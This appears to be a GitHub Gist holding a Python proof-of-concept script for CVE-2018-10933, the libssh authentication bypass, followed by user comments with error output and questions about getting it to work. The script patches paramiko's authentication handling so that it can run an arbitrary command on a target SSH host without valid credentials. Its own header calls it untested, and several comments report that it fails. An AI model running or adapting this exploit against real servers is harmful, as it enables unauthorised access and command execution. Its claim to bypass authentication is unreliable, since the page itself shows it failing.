#!/usr/bin/env python | |
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# Untested script for CVE-2018-10933
import sys, paramiko | |
import logging | |
# Positional command-line arguments: login name, target host, remote command.
# Nothing is validated here, so a short argument list ends in IndexError.
username, hostname, command = sys.argv[1], sys.argv[2], sys.argv[3]

# Fetch the callable that paramiko's AuthHandler dispatch table holds for
# MSG_USERAUTH_SUCCESS. `_handler_table` is a private attribute (leading
# underscore), so this lookup presumably depends on the installed paramiko
# version -- confirm before relying on it.
_auth_table = paramiko.auth_handler.AuthHandler._handler_table
new_auth_accept = _auth_table[paramiko.common.MSG_USERAUTH_SUCCESS]
def auth_accept(*args, **kwargs):
    """Forward every argument unchanged to ``new_auth_accept``.

    ``new_auth_accept`` is the module-level reference to the handler that
    paramiko had registered for MSG_USERAUTH_SUCCESS. This wrapper adds no
    logic of its own and returns whatever that handler returns.
    """
    handler_result = new_auth_accept(*args, **kwargs)
    return handler_result
# Process-wide monkey-patch: after this assignment the dispatch table maps
# MSG_USERAUTH_REQUEST to the same handler as MSG_USERAUTH_SUCCESS.
# NOTE(review): this table appears to drive how paramiko dispatches packets
# it *receives*, so the patch changes how this client reacts to an incoming
# MSG_USERAUTH_REQUEST; it does not by itself show what the client sends.
# Confirm against the paramiko version in use.
paramiko.auth_handler.AuthHandler._handler_table[
    paramiko.common.MSG_USERAUTH_REQUEST
] = auth_accept

port = 22
try:
    # DEBUG-level logging sends paramiko's transport negotiation to stderr.
    logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    client = paramiko.SSHClient()
    # WarningPolicy only logs unknown host keys and then accepts them, so the
    # server's identity is not verified on this connection.
    client.set_missing_host_key_policy(paramiko.WarningPolicy)
    # Placeholder credentials: an empty password and a key file path.
    connect_options = {
        "port": port,
        "username": username,
        "password": "",
        "pkey": None,
        "key_filename": "fake.key",
    }
    # The file header marks this script as untested, so an
    # AuthenticationException raised here is not evidence that the server
    # runs a fixed libssh. Check the installed libssh version against the
    # advisory linked at the top of the file instead.
    client.connect(hostname, **connect_options)
    stdin, stdout, stderr = client.exec_command(command)
    # Python 2 print statement; the trailing comma suppresses the newline.
    print stdout.read(),
finally:
    # `client` is bound inside the try block. If logging setup or SSHClient()
    # raised first, this close() would itself fail with NameError.
    client.close()
IOError: [Errno 2] No such file or directory: 'fake.key' |
rute@Kali2018:~/mlosapio-libssh# python ./CVE-2018-10933-test.py rute localhost pwd |
pip install paramiko==2.0.8 will work fine!!! |
got an error
type pwd
/Users/username/Documents
for testing on localhost - https://github.com/SoledaD208/CVE-2018-10933 |
I don't know why it throws this exception: "paramiko.ssh_exception.AuthenticationException: Authentication failed."
My SSH box looks like this: SSH version : SSH-2.0-libssh_0.7.0 I ran the following command: Below is the output: |
As another user pointed out, you must change:
for
I've tested the script on a known vulnerable server and it does return a I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong. |
exec_command does not work: DEBUG:paramiko.transport:Authentication type (publickey) not permitted.
from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
anyone can confirm this? |
Yes, libssh is a library that implements the SSH protocol, including the server side, and OpenSSH is another, separate implementation.
what is wrong here ? installed python-paramiko root@test-VM:/home/test# python3 asd.py |
Hi there, I chanced upon this and wondering if you could advise if there is a need for me to have an actual server before I can test this code? Or could I test it locally, eg. In Kali via VirtualBox? |
not working,
INFO:paramiko.transport:Authentication (publickey) failed.
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) failed.
DEBUG:paramiko.transport:EOF in transport thread
Traceback (most recent call last):
paramiko.AuthenticationException: Authentication failed.